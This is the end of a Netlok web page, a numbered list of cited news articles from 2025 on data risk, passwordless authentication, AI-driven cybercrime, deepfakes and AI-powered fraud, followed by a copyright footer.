[9] Whistleblower: DOGE Put Millions of Americans’ Data at Risk — TIME (August 2025)
[11] More companies are shifting workers to passwordless authentication — CNBC (November 2025)
[12] AI-driven cybercrime is growing, here’s how to stop it — World Economic Forum (January 2025)
[13] Deepfake Statistics & Trends 2025 — Keepnet Labs (November 2025)
[14] AI-powered fraud is exploding — Cybernews/Entrust (November 2025)
[15] Forrester: Agentic AI-Powered Breach Will Happen in 2026 — Infosecurity Magazine (October 2025)
Member – Insider GovTech
FOLLOW US ON SOCIAL MEDIA
©2015-2026 Netlok. All rights reserved.